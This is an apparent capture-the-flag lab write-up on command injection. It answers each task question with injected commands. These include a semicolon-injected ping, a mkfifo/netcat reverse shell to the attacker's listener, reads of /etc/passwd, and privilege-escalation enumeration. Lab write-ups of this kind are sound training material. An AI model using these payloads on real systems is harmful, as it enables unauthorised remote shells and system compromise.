[Task 3] Blind Command Injection
- Ping the box with 10 packets. What is this command (without IP address)?
Access the site
Prepare attacker machine to accept for ping command
tcpdump ip proto \\icmp -i tun0
; ping -c 10 <attacker ip> 
Back to attacker machine, success!!!
2. Redirect the box’s Linux Kernel Version to a file on the web server. What is the Linux Kernel Version?
I will get the reverse shell.
Prepare listener
nc -lvp 1234
Reverse shell reference:
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Paste the command and submit.
Back to listener, now I have a shell
uname -a
3. Enter “root” into the input and review the alert. What type of alert do you get?
4. Enter “www-data” into the input and review the alert. What type of alert do you get?
5. Enter your name into the input and review the alert. What type of alert do you get?
[Task 4] Active Command Injection
- What strange text file is in the website root directory?
ls
cat drpepper.txt
2. How many non-root/non-service/non-daemon users are there?
cat /etc/passwd
The answer is zero.
3. What user is this app running as?
whoami
4. What is the user’s shell set as?
from #2
5. What version of Ubuntu is running?
lsb_release -a
6. Print out the MOTD. What favorite beverage is shown?
cat /etc/update-motd.d/00-header
[Task 5] Get The Flag!
- Get the flag!
Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Sudo
sudo -l
SUID
find / -perm -u=s -type f 2>/dev/null
Cronjob
cat /etc/crontab
Capabilities
getcap -r / 2>/dev/null
After all of these, I’m hitting the wall. Looking at hint may help
No privesc!!! Maybe there’re hidden flag.
find / 2>>/dev/null | grep -i "flag"Lucky me!!!
cat /etc/flag.txt
